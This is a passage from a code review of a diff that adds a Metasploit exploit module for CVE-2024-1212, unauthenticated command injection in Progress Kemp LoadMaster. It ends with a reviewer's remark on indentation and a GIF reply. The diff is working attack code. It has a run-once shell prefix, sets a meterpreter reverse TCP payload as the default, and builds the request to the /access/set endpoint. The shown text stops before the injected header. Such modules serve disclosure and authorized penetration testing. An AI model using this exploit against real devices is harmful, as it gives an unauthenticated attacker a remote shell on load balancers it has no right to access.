modules/exploits/linux/http/progress_kemp_loadmaster_unauth_cmd_injection.rb

```diff
@@ -0,0 +1,131 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+  def flag_file
+    return @flag_file unless @flag_file.nil?
+
+    @flag_file = '/tmp/' + Rex::Text.rand_text_alpha(5)
+  end
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Kemp LoadMaster Unauthenticated Command Injection',
+        'Description' => %q{
+          This module exploits an unauthenticated command injection vulnerability in
+          Progress Kemp LoadMaster in the authorization header.
+        },
+        'Author' => [
+          'Dave Yesland with Rhino Security Labs',
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2024-1212'],
+          ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/'],
+          ['URL', 'https://kemptechnologies.com/kemp-load-balancers']
+        ],
+        'DisclosureDate' => '2024-03-19',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        },
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Automatic', # Add logic to run the payload only once
+            {
+              'Payload' => {
+                'Prepend' => "[ -f #{flag_file} ] || ( touch #{flag_file}; (sleep 60; rm #{flag_file})& ",
+                'Append' => ')',
+                'BadChars' => "\x3a\x27"
+              }
+            }
+          ],
+          [
+            'Do_Not_Prepend_Runonce_Code', # This will likely result in 2-3 sessions
+            {
+              'Payload' => {
+                'BadChars' => "\x3a\x27"
+              }
+            }
+          ]
+        ],
+        'Default_target' => 0,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
+          'FETCH_WRITABLE_DIR' => '/tmp/',
+          'SSL' => true,
+          'RPORT' => 443
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The URI path to LoadMaster', '/'])
+    ])
+  end
+
+  def exploit
+    uri = normalize_uri(target_uri.path, 'access', 'set')
+
+    vprint_status('Sending payload...')
+
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => uri,
+      'vars_get' =>
+                         {
+                           'param' => 'enableapi',
+                           'value' => '1'
+                         },
```

Comment:
This indentation seems like something rubocop should have complained about

Reply:
![](https://media.giphy.com/media/v1.Y2lkPTc5MGI3NjExeWNzOTk3NjYzMndycnpsMG1sN2M3M3BqdTdkYXV6dWxoMmN2ZGwxcCZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/8tbZH3lN7j560/giphy.gif)